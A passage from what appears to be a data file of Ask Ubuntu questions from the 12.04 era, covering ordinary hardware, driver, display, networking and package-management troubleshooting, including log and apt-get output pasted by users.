black defassociation = 0x1 , sequence = 0x2 pin-ctls : 0x40 : out unsolicited : tag=03 , enabled=1 connection : 5 0x0c 0x0d* 0x0e 0x0f 0x26 node 0x16 [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' center playback switch '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 control : name= '' lfe playback switch '' , index=0 , device=0 controlamp : chs=2 , dir=out , idx=0 , ofs=0 control : name= '' line-out clfe jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x00000036 : in out detect trigger pin default 0x01016411 : [ jack ] line out at ext rear conn = 1/8 , color = orange defassociation = 0x1 , sequence = 0x1 pin-ctls : 0x40 : out unsolicited : tag=04 , enabled=1 connection : 5 0x0c 0x0d 0x0e* 0x0f 0x26 node 0x17 [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' side playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' line-out side jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x00000036 : in out detect trigger pin default 0x01012414 : [ jack ] line out at ext rear conn = 1/8 , color = grey defassociation = 0x1 , sequence = 0x4 pin-ctls : 0x40 : out unsolicited : tag=05 , enabled=1 connection : 5 0x0c 0x0d 0x0e 0x0f* 0x26 node 0x18 [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' rear mic boost volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' rear mic jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x80 0x80 ] pincap 0x0000373e : in out hp detect trigger vref caps : hiz 50 grd 80 100 pin default 0x01a19c40 : [ jack ] mic at ext rear conn = 1/8 , color = pink defassociation = 0x4 , sequence = 0x0 pin-ctls : 0x21 : in vref_50 unsolicited : tag=06 , enabled=1 connection : 5 0x0c* 0x0d 0x0e 0x0f 0x26 node 0x19 [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' front mic boost volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' front mic jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x03 0x03 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x80 0x80 ] pincap 0x0000373e : in out hp detect trigger vref caps : hiz 50 grd 80 100 pin default 0x02a19c50 : [ jack ] mic at ext front conn = 1/8 , color = pink defassociation = 0x5 , sequence = 0x0 pin-ctls : 0x24 : in vref_80 unsolicited : tag=07 , enabled=1 connection : 5 0x0c* 0x0d 0x0e 0x0f 0x26 node 0x1a [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' line jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x80 0x80 ] pincap 0x0000373e : in out hp detect trigger vref caps : hiz 50 grd 80 100 pin default 0x01813c41 : [ jack ] line in at ext rear conn = 1/8 , color = blue defassociation = 0x4 , sequence = 0x1 pin-ctls : 0x20 : in vref_hiz unsolicited : tag=08 , enabled=1 connection : 5 0x0c* 0x0d 0x0e 0x0f 0x26 node 0x1b [ pin complex ] wcaps 0x40018f : stereo amp-in amp-out control : name= '' headphone playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' front headphone jack '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x03 , stepsize=0x27 , mute=0 amp-in vals : [ 0x00 0x00 ] amp-out caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-out vals : [ 0x00 0x00 ] pincap 0x0000373e : in out hp detect trigger vref caps : hiz 50 grd 80 100 pin default 0x02214c20 : [ jack ] hp out at ext front conn = 1/8 , color = green defassociation = 0x2 , sequence = 0x0 pin-ctls : 0xc0 : out hp vref_hiz unsolicited : tag=01 , enabled=1 connection : 5 0x0c 0x0d 0x0e 0x0f 0x26* node 0x1c [ pin complex ] wcaps 0x400001 : stereo pincap 0x00000020 : in pin default 0x9933014f : [ fixed ] cd at int atapi conn = atapi , color = unknown defassociation = 0x4 , sequence = 0xf misc = no_presence pin-ctls : 0x20 : in node 0x1d [ pin complex ] wcaps 0x400000 : mono pincap 0x00000020 : in pin default 0x411111f0 : [ n/a ] speaker at ext rear conn = 1/8 , color = black defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x20 : in node 0x1e [ pin complex ] wcaps 0x400300 : mono digital pincap 0x00000010 : out pin default 0x014b1130 : [ jack ] spdif out at ext rear conn = comb , color = black defassociation = 0x3 , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out connection : 1 0x06 node 0x1f [ pin complex ] wcaps 0x400200 : mono digital pincap 0x00000020 : in pin default 0x01cb6160 : [ jack ] spdif in at ext rear conn = comb , color = orange defassociation = 0x6 , sequence = 0x0 misc = no_presence pin-ctls : 0x20 : in node 0x20 [ vendor defined widget ] wcaps 0xf00040 : mono processing caps : benign=0 , ncoeff=17 node 0x21 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x22 [ audio mixer ] wcaps 0x20010b : stereo amp-in control : name= '' input source '' , index=1 , device=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] connection : 11 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 0x16 0x17 0x0b node 0x23 [ audio mixer ] wcaps 0x20010b : stereo amp-in control : name= '' input source '' , index=0 , device=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x80 0x80 ] [ 0x00 0x00 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] connection : 11 0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x14 0x15 0x16 0x17 0x0b node 0x24 [ vendor defined widget ] wcaps 0xf00000 : mono node 0x25 [ audio output ] wcaps 0x11 : stereo converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm node 0x26 [ audio mixer ] wcaps 0x20010f : stereo amp-in amp-out control : name= '' headphone playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-in caps : ofs=0x00 , nsteps=0x00 , stepsize=0x00 , mute=1 amp-in vals : [ 0x00 0x00 ] [ 0x00 0x00 ] amp-out caps : ofs=0x1f , nsteps=0x1f , stepsize=0x05 , mute=0 amp-out vals : [ 0x1f 0x1f ] connection : 2 0x25 0x0b codec : ati r6xx hdmi address : 0 afg function id : 0x1 ( unsol 0 ) vendor id : 0x1002aa01 subsystem id : 0x00aa0100 revision id : 0x100100 no modem function group found default pcm : rates [ 0x70 ] : 32000 44100 48000 bits [ 0x2 ] : 16 formats [ 0x1 ] : pcm default amp-in caps : n/a default amp-out caps : n/a gpio : io=0 , o=0 , i=0 , unsolicited=0 , wake=0 node 0x02 [ audio output ] wcaps 0x201 : stereo digital converter : stream=1 , channel=0 digital : enabled genlevel digital category : 0x2 node 0x03 [ pin complex ] wcaps 0x400381 : stereo digital control : name= '' hdmi/dp , pcm=3 jack '' , index=0 , device=0 control : name= '' iec958 playback con mask '' , index=0 , device=0 control : name= '' iec958 playback pro mask '' , index=0 , device=0 control : name= '' iec958 playback default '' , index=0 , device=0 control : name= '' iec958 playback switch '' , index=0 , device=0 control : name= '' eld '' , index=0 , device=3 pincap 0x00000094 : out detect hdmi pin default 0x18560010 : [ jack ] digital out at int hdmi conn = digital , color = unknown defassociation = 0x1 , sequence = 0x0 pin-ctls : 0x00 : unsolicited : tag=01 , enabled=1 connection : 1 0x02 my speaker is in black jack . how can i fix this ? thanks
146550	forcing a game to resize on launch ?	the good news : this totally worked to give me screen size options for some games in ubuntu . the bad news : i did n't take into account the menu bar at the top of the screen , and the resized game does n't allow me to move the screen up high enough to access the `` ok '' button at the bottom of the screen that would let me change the screen to an even more appropriate size . so now i have a game that runs in a screen about 10 % larger than the actual screen , and no way of actually clicking `` ok '' to confirm a smaller screen size . there does n't seem to be any way to tab to the ok button , or to click it `` below-screen '' -- the mouse stops at the screen bottom . is there a way to force a program or game to start at a certain resolution ?
146555	want entry as root at login screen to do backups via deja-dup gui	i want to use the deja-dup gui to backup ( the one with the black safe icon ) . i prefer to do this as root user , not as a normal user . when i enter root as username in login screen and the correct password , the cursor just spins and wo n't let me in . i ca n't recall whether this happened before . is there something new in precise that prevents this . i am fully aware of super user security issues , but i think backups should be done as root .
146557	headless openvpn server with inadyn	the goal : bypassing the great firewall of china while i am there on a contract . the concept : a micro-minimal install of ubuntu on a headless machine left behind in the states which boots and runs from a cd or dvd with only three tasks : login , run inadyn to update the external dns via dyndns and launch openvpn as a server . ubuntu , iandyn and opendns because i am familiar with them , i have this working with a full install . i 'm open to other options . i want a cd/dvd to minimize maintenance in the case of hardware failure -- my `` hosts '' for this box are capable of plugging in a new drive -- but restoring a disk image , not so much . so , the question is what / how can i best uninstall everything else but the core and these two tasks ? i 'm trial-and-erroring it , but perhaps ( almost certainly ) someone has more experience than i in minimizing disk space while still having a functional enough os ?
146564	how do i get a d-link dwl-g520 working ?	i have ubuntu 12.04 on an older desktop pc , and i am finding it much harder to connect to a wifi connection than it should be . i have an iphone with which i want to tether to it with mifi 4.0 , but i need to install ipheth which i ca n't do without internet on that computer . i am typing from my other windows pc with which i can download and move hings with thumb drives , but have n't gotten keryx to work . i also found a d-link dwl-g520 high speed 2.4ghz ( 802.11g ) wireless 108mbps pci adapter which i installed , but ca n't find a driver to put on a flashdrive to use it . if anybody has any ideas , they are appreciated . i am a noob , and i do n't want to have to move the comp . downstairs to plug into the modem . ps : i also have a netgear usb network adapter , which does n't work with my ubuntu .
146565	ubuntu 12.04 freezes with ivy bridge processor	my machine with an ivy bridge cpu is stable under windows 7 but freezes in ubuntu 12.04 lts 64-bit . the freezing appears to occur randomly . i read somewhere that kernel 3.3.6 fixes the ubuntu freeze issue . any idea when this will be available in 12.04 ? specs : asrock extreme3 motherboard with i5-3570k processor ( no overclocking )
146566	recovering raid 0 hard disk	i bumped to a huge ( for me ) problem . i was running dual boot system ( win 7 / linux ) and at some point i decided to test fedora ( i am new in linux ) . my hard disk conf : 3 hard disks each 1 tb , 2 set to raid 0 with windows running on it and 1 for linux . after installing it from live usb i found out that windows 7 is not in grub anymore and while booting shows raid error . i installed back ubuntu and ran disk utility and checked now i have one disks ( raid 0 ) failed ( read ) error . first has 5 bad sectors and second has 1 bad sector . and now i dont know what to do and how to repair . further i dont know which data i could provide to get help . i tried ntfsfix and got this output : mounting volume ... ntfs signature is missing . failed attempting to correct errors ... ntfs signature is missing . failed failed to startup volume : invalid argument ntfs signature is missing . trying the alternate boot sector unrecoverable error volume is corrupt . you should run chkdsk . # sudo ntfs-3g -o force , rw /dev/sdb /media/windows ntfs signature is missing . failed to mount '/dev/sdb ' : invalid argument the device '/dev/sdb ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ?
146567	monitor shows 'no signal ' after nvidia driver installation ( ubuntu 12.04 amd64 )	i use ubuntu 12.04 amd64 the last thing i see before this message is ubuntu boot splash screen . the hardware configuration is : gigabyte 970a-ud3 motherboard amd phenom ii x4 975 processor 8 gb ram nvidia corporation gt200 [ geforce gtx 260 ] i 've tried to remove xorg.conf , but nothing have changed . and now i have no idea about what should i do to make it work . here 's an excerpt from /var/log/xorg.0.log that seems to make sense . [ 13.956 ] ( == ) matched nvidia as autoconfigured driver 0 [ 13.956 ] ( == ) matched nouveau as autoconfigured driver 1 [ 13.956 ] ( == ) matched nv as autoconfigured driver 2 [ 13.956 ] ( == ) matched vesa as autoconfigured driver 3 [ 13.956 ] ( == ) matched fbdev as autoconfigured driver 4 [ 13.956 ] ( == ) assigned the driver to the xf86configlayout [ 13.956 ] ( ii ) loadmodule : `` nvidia '' [ 13.956 ] ( ww ) warning , could n't open module nvidia [ 13.956 ] ( ii ) unloadmodule : `` nvidia '' [ 13.956 ] ( ii ) unloading nvidia [ 13.956 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 13.956 ] ( ii ) loadmodule : `` nouveau '' [ 13.957 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 13.957 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 13.957 ] compiled for 1.11.3 , module version = 0.0.16 [ 13.957 ] module class : x.org video driver [ 13.957 ] abi class : x.org video driver , version 11.0 [ 13.957 ] ( ii ) loadmodule : `` nv '' [ 13.957 ] ( ww ) warning , could n't open module nv [ 13.957 ] ( ii ) unloadmodule : `` nv '' [ 13.957 ] ( ii ) unloading nv [ 13.957 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 13.957 ] ( ii ) loadmodule : `` vesa '' [ 13.957 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 13.957 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 13.957 ] compiled for 1.11.3 , module version = 2.3.0 [ 13.957 ] module class : x.org video driver [ 13.957 ] abi class : x.org video driver , version 11.0 [ 13.957 ] ( ii ) loadmodule : `` fbdev '' [ 13.957 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 13.957 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 13.957 ] compiled for 1.11.3 , module version = 0.4.2 [ 13.957 ] abi class : x.org video driver , version 11.0 [ 13.957 ] ( == ) matched nvidia as autoconfigured driver 0 [ 13.957 ] ( == ) matched nouveau as autoconfigured driver 1 [ 13.957 ] ( == ) matched nv as autoconfigured driver 2 [ 13.957 ] ( == ) matched vesa as autoconfigured driver 3 [ 13.957 ] ( == ) matched fbdev as autoconfigured driver 4 [ 13.957 ] ( == ) assigned the driver to the xf86configlayout [ 13.957 ] ( ii ) loadmodule : `` nvidia '' [ 13.958 ] ( ww ) warning , could n't open module nvidia [ 13.958 ] ( ii ) unloadmodule : `` nvidia '' [ 13.958 ] ( ii ) unloading nvidia [ 13.958 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 13.958 ] ( ii ) loadmodule : `` nouveau '' [ 13.958 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 13.958 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 13.958 ] compiled for 1.11.3 , module version = 0.0.16 [ 13.958 ] module class : x.org video driver [ 13.958 ] abi class : x.org video driver , version 11.0 [ 13.958 ] ( ii ) unloadmodule : `` nouveau '' [ 13.958 ] ( ii ) unloading nouveau [ 13.958 ] ( ii ) failed to load module `` nouveau '' ( already loaded , 0 ) [ 13.958 ] ( ii ) loadmodule : `` nv '' [ 13.958 ] ( ww ) warning , could n't open module nv [ 13.958 ] ( ii ) unloadmodule : `` nv '' [ 13.958 ] ( ii ) unloading nv [ 13.958 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 13.958 ] ( ii ) loadmodule : `` vesa ''
146574	configuring the package manage failed - installation on 11.10	i have a 32-bit server , running at 3.03 ghz , 2gb ram & 512 l2 cache . whenever i try to install ubuntu 11.10 or 12.04 , after installing the base system , we get to setting up users and passwords , then configuring the package manager , which fails everytime . i 've tried everything i can think of , but nothing seems to work . any suggestions of what is wrong and how to fix it ? thanks .
146575	what is the x version in 12.04 ?	just a matter of curiosity , i was wondering what version of x comes with precise . problem is , it reports ( x -version , as well as xprotocolversion/xprotocolrevision ) that it is x11r0 . this was a fresh install from the xubuntu 12.04 install cd . is this a configuration issue on my system , or a bug , or is the revision a don't-care now ? merely curious -- does n't seem to break anything .
146576	how to install netgear n-300 uab adapter wna3100 on ubuntu 12.04	after a fresh install of ubuntu 12.04 , the first thing i 'm trying to do , is to setup my wireless adapter . i can see it using lsusb : beer @ beer-linux : ~ $ lsusb ... bus 002 device 006 : id 0846:9020 netgear , inc. wna3100 ( v1 ) wireless-n 300 [ broadcom bcm43231 ] ... i have found a lot of dated instructions on the net and just wanted to know what the right way is to set it up on 12.04 . i do n't want to mess up a brand new install by tweaking things that do n't need tweaking . according to most posts , you have to install the windows drivers using the ndiswrapper package . is this still the right way to go ? if so , it would be great if someone could write down the steps to do this under 12.04
146578	install ubuntu 12.04 in dell xps 13	i just got a dell xps13 ( i5 , 4gb ram , 128gb solid state drive ) . my other computers have a dual-boot partition with ubuntu12.04/win7 . i 'd like to install ubuntu only in this machine to force myself to work with linux better . has anyone seen a description of the installation process ? i 've found many threads on fine-tuning the system , but very little on installation step-by-step . some issues i 'd like to get feedback on include : ( 1 ) installing from a usb pen drive ( i 've always installed from a cd-rom , this machine has none ) ( 2 ) partition recommendations for optimal performance ( size for swap , for system , for data ) ( 3 ) how can the machine be recovered to its original state if so wished ? ( no recovery cds in this generation of machines ) thanks in advance , -- emagar
146581	ca n't bind super + w in xbindkeys , all other combos work fine	i am trying to set key bindings for my mouse buttons with xbindkeys and i 'd like to set one of them to spread the windows as if i 'd pressed super + w but for some reason this one wo n't bind properly it just registers as a regular press of the 'w ' key . i 've tried every other combination of super + __ and they all work fine and unfortunately ccsm no longer allows rebinding this combination in 12.04 . does anyone know why this one combination would n't work or how i can remap the spread windows action to another set of keys ?
146585	how do i make the f-keys work in byobu , for midnight commander ( mc ) , htop , etc ?	i use byobu with the tmux backend on my 12.04 server . i 'd like to use the midnight commander shortcut keys with it , but the f keys do n't work . i 've seen some posts on the issues here : https : //bugs.launchpad.net/byobu/+bug/386363 https : //answers.launchpad.net/byobu/+question/127610 but they are out of date and do n't seem to work for newer versions of byobu . how can i either work around this or use mc in a way that works better ?
146587	amnesia just closes after i select new game	i have a laptop with intel gma 4500m integrated graphics , 4gb of ram and a 2.2ghz dual core processor with ubuntu 12.04 64-bit . i recently bought the humble indie bundle 5 and i was able to install and play limbo , bastion and sword and sworcery , i have n't installed psychonauts yet and i have installed but unfortunately can not play amnesia . i choose the lowest possible settings but when i start a new game it just closes on me . any suggestions ?
146592	dual monitor maximize problem	i have a laptop with an external monitor attached . however everything maximizes to the external monitor , no matter how or where i maximize the windows . i want to be able to have windows maximized in the monitor it is currently in .
146598	ubuntu 12.04 laptop battery is n't charging ?	my hp elitebook charged perfectly when windows 7 was installed . 8560p . i wiped the drive , installed 12.04 . for a little while , i could suspend the laptop , and it would charge when the lid was closed . at some point in the last week , after some update , the battery never charges and it does n't seem like the laptop suspends or hibernates properly any more .
146600	vmware workstation can not create ~/.vmware directory	i just installed vmware workstation 8.0.3 on ubuntu 12.04 . everytime it starts up it says that vmware needs ~/.vmware to save preferences and that it is unable to create ~/.vmware . but ~/.vmware is already a directory . how do i get this resolved ?
146602	ureadahead not working on ubuntu 12.04lts	i discovered using bootchart that my ureadahead is n't working on ubuntu 12.04lts on a dell inspiron 1545 , anybody have any suggestions ?
146603	max ram for computer 16gb or 8gb	manufacturer 's specifications for my notebook say memory can be extended from 4gb to 8gb . whereas , running sudo dmidecode suggests the computer can use 16gb as below : handle 0x0037 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 16 gb error information handle : not provided number of devices : 4 which one is correct ?
146607	ca n't n run a bootable cd of ubuntu desktop on a laptop with no os	i recorded a bootable cd with the image that i downloaded from the ubuntu site , using nti cd maker . my laptop had a problem and i prefered to get it fixed without installing an os . now , when i try to run this cd it shows the following error mssage : device driver not found : 'mscd001 ' . no valid cdrom device drivers were selected mouse driver was previously installed a : \ > if the drive was n't working the cd would n't even start , i assume ... .so can anyone help me please ! thank you !
146610	why does upgrading to 12.04 on an openvz vps warn that the kernel size is 0 ?	when i tried to upgrade my server to ubuntu 12.04 , it gave this message , but the upgrade process will continue : warning : root : estimate_kernel_size_in_boot ( ) returned '0 ' ? this is a vps server on openvz . i just upgraded from 11.04 to 11.10 without any problems . but what to do now ?
146612	my hardware mac address is always 00:00:00:00:00:00 until i manually update 'eth0 ' . how can i fix this ?	i am using ubuntu 12.04 . i use a wired connection . my network mac address shows as 00:00:00:00:00:00 . when i enter the commands below into a terminal window , it starts working again . sudo ifconfig eth0 down sudo ifconfig eth0 hw ether my mac address sudo ifconfig eth0 up i have to enter these commands every time i want to use the internet . how can i fix this ? update copied from comment the contents of my /etc/networkmanager/networkmanager.conf file is : [ main ] plugins=ifupdown , keyfile dns=dnsmasq no-auto-default=00:00:00:00:00:00 , [ ifupdown ] managed=false
146614	are there any spyware threats due to 3rd party plugins ?	i installed the plugin mentioned in the following link and after that , by ubuntu 12.04 lts behaves a little strange , particularly keyboard shortcuts are not working as expected . http : //www.webupd8.org/2012/03/recoll-lens-full-text-search-unity-lens.html actually my worry is not about keyboard shortcuts , but are there any spyware threats by installing 3rd party applications ( not through ubuntu software centre ) like that .
146621	what is the equivalent of windows system properties or device manager ?	i am new to ubuntu . in windows , if i want to know my system properties/configuration , i can see it by going to control panel and clicking on the system icon . i can also get a detailed list of the hardware detected/installed by going to the device manager . what are the equivalents of these features in ubuntu , where a user can see his or her system properties and hardware configuration , like ram , cpu/processor , hard disk capacity , etc. ? example of windows system properties :
146632	driver for vodafone usb dongle k3570-z	kindly send me the driver for vodafone usb dongle k3570-z or any other necessary steps for installing vodafone usb dongle k3570-z for eduubuntu .
146634	shell script to move all files from subfolders to parent folder	i 've bunch of folders in folder a. i want to move files from all those folders to a . or i want to cut all files from child folders and paste them in parent folder . how to do that ?
146635	workspace switcher icon is not valid in mac lion theme	in my unity there is one problem : this issue hapened when i changed my icon theme to mac-lion-theme
146637	unable to open update manager after upgrading 11.10 to 12.04	while upgrading from ubuntu 11.10 to ubuntu 12.04 , the computer hung up and i had to force shutdown . later when i realized the ubuntu is not working , i went to recovery mode and said repair packages . then it opened normally but now i ca n't find update manager or network connections in my desktop . i do n't know where to find them also . i 've enough disk space and i 'm using hp pavilion dm4 .
146639	how to install openmotif on 12.04	there is no package called openmotif , so how do i install it on ubuntu 12.04 ? it 's needed according to citrix , for using citrix receiver 12.1 for linux .
146640	eclipse on 12.04	what happen with my eclipse on ubuntu 12.04 , after upgrade linux kernel 3.4 ? `` an error has occurred . see the log file /home/kidd/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1338875244475.log '' displayed when i open eclipse .
146644	error 'failed to create directory locally ' while downloading with fire ftp	i 'm using fire ftp ( firefox add-on ) in ubuntu to download my project locally but when i click on download , it says failed to create directory `` project1 '' locally . is there any root permission issue ? if yes then how i can download my project using fire ftp ?
146654	how can i completely disable internal mic and webcam	i want to disable the internal microphone on my laptop and the internal webcam completely that they 're no longer selectable , and no longer available ? i will only use my external webcam , and my external ( usb ) headset . the internal audio should still be available for playback .
146656	ca n't run assault cube	i installed assault cube from the software centre and it just opens for half a second and closes . when i run in it from the terminal , this is what i get - d @ d-platform : ~ $ assaultcube using home directory : /home/d/.assaultcube_v1.104 current locale : en_in init : sdl init : net init : world init : video : sdl init : video : mode x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 129 ( xfree86-vidmodeextension ) minor opcode of failed request : 10 ( xf86vidmodeswitchtomode ) value in failed request : 0xb3 serial number of failed request : 131 current serial number in output stream : 133
146660	how can i compile a c program file which i created using the libre office editor ?	i 'm new to linux and i need some help ! i am trying to compile the code taken from this post to the linux-kernel mailing list . i have pasted the file into libre office and saved it as pairing_tool.c ( not as pairing_tool.c.odt . i have renamed the file to pairing_tool.c . ) but when i use this command line : gcc -o pairing_tool pairing_tool.c in the terminal , i get many errors . what did i do wrong ? should i paste the text into a special text editor ? also just to be clear , i 've used the text included only in between # include < linux/input.h > and return 0 ; } so i have n't put the comments . i think it is good this way , is it ?
146665	packard bell easynote ts1hr-120it notebook , is it compatible with ubuntu ?	i 've bought a notebook packard bell easynote ts1hr-120it and i want to install linux ( preferably ubuntu but i 'm not sure if it is compatible .
146666	switch from one real o/s to another real o/s without rebooting the machine	how to switch from one base machine ( not a virtual machine ) to another base machine without rebooting the system , which are placed on same hdd but different partition , for e.g . one o/s is installed on c drive and other o/s is on d drive .
146671	is it possible to create a live usb stick with a clone of my desktop installation	live usb sticks really come in handy very often . but setting them up ( installing and configuring all the programs i need ) is tedious , and largely duplicates the effort i make when setting up my ordinary desktop installation . it 'd spare a lot of time if i could just transfer my desktop installation to a bootable usb stick . is anything like this possible ?
146678	hp pavilion dv4-3029tx wireless	i just bought an hp dv4-3029tx and installed ubuntu 12.04 on it . it has a centrino wireless-n 1030 card . i have no problems with wired connections , nor with connecting to my smartphone 's mobile hotspot , but with my home wireless connection just wo n't work , it 's just impossible to make a connection . just to add to the mystery is the fact that several other devices i own are connecting flawlessly to my home wireless network so the home wireless is n't the issue . i 've downloaded the appropriate driver from intellinuxwireless.org and extracted it to /lib/firmware but with no improvement , any ideas ?
146681	apt-get install -f tries to remove important packages	i wanted to install dependencies for dropbox , and i found apt trying to remove some quite important packages ... note that in the remove section there is compiz or vim ... how to proceed , safely , with the apt ? i use ubuntu 12.04 lts $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libunity6 librbd1 gir1.2-gmenu-3.0 msr-tools libaio1 gir1.2-gnomekeyring-1.0 seabios syslinux-legacy librados2 libxenstore3.0 gtk3-engines-unico cpu-checker gir1.2-appindicator3-0.1 ebtables libvirt0 libgmime2.6-cil vgabios libgtkspell-3-0 libnuma1 gir1.2-gudev-1.0 gir1.2-wnck-3.0 cgroup-lite gir1.2-launchpad-integration-3.0 qemu-utils bridge-utils libvirt-bin librsync1 activity-log-manager-common qemu-common libgtk2.0-0 : i386 libgdk-pixbuf2.0-0 : i386 libcairo2 : i386 libpango1.0-0 : i386 libthai0 : i386 libatk1.0-0 : i386 libxft2 : i386 libpixman-1-0 : i386 libjasper1 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libdatrie1 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libatk1.0-0 : i386 libcairo2 : i386 libdatrie1 : i386 libgdk-pixbuf2.0-0 : i386 libgtk2.0-0 : i386 libjasper1 : i386 libpango1.0-0 : i386 libpixman-1-0 : i386 libpython3.2 libthai0 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxft2 : i386 python3 python3-minimal python3-uno python3.2 python3.2-minimal suggested packages : librsvg2-common : i386 gvfs : i386 libjasper-runtime : i386 ttf-baekmuk : i386 ttf-arphic-gbsn00lp : i386 ttf-arphic-bsmi00lp : i386 ttf-arphic-gkai00mp : i386 ttf-arphic-bkai00mp : i386 python3-doc python3-tk python3.2-doc the following packages will be removed : activity-log-manager-control-center aisleriot alacarte apparmor apparmor-utils apport apport-gtk apt-xapian-index aptdaemon apturl apturl-common bluez bluez-alsa bluez-gstreamer checkbox checkbox-gtk checkbox-qt command-not-found compiz compiz-gnome compiz-plugins-main compiz-plugins-main-default compizconfig-backend-gconf computer-janitor computer-janitor-gtk deja-dup dropbox : i386 duplicity eog evolution evolution-data-server evolution-exchange evolution-indicator evolution-plugins evolution-webcal firefox firefox-globalmenu firefox-gnome-support foo2zjs foomatic-db-compressed-ppds gconf-editor gconf2 gdb gdm gedit gir1.2-peas-1.0 gir1.2-rb-3.0 gir1.2-totem-1.0 gir1.2-ubuntuoneui-3.0 gksu gnome-applets-data gnome-bluetooth gnome-control-center gnome-doc-utils gnome-exe-thumbnailer gnome-media gnome-menus gnome-orca gnome-panel-data gnome-search-tool gnome-sudoku gnome-terminal gnome-terminal-data gnome-user-share gstreamer0.10-gconf guake gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hplip hplip-data ibus ibus-pinyin ibus-table indicator-datetime indicator-power ipython jockey-common jockey-gtk landscape-client-ui-install language-selector-common language-selector-gnome launchpad-integration libbonoboui2-0 libcanberra-gtk-module libcanberra-gtk3-module libcompizconfig0 libevolution libfolks-eds25 libgksu2-0 libgladeui-1-11 libgnome-media-profiles-3.0-0 libgnome-vfs2.0-cil libgnome2-0 libgnome2-common libgnome2.24-cil libgnomeui-0 libgnomevfs2-0 libgnomevfs2-common libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libmetacity-private0 libpeas-1.0-0 libpurple-bin libpython2.7 libreoffice-gnome librhythmbox-core5 libsyncdaemon-1.0-1 libtotem0 libubuntuoneui-3.0-1 light-themes lsb-release metacity metacity-common nautilus-share network-manager-gnome nvidia-common onboard oneconf openoffice.org-gnome openprinting-ppds pitivi printer-driver-foo2zjs printer-driver-ptouch 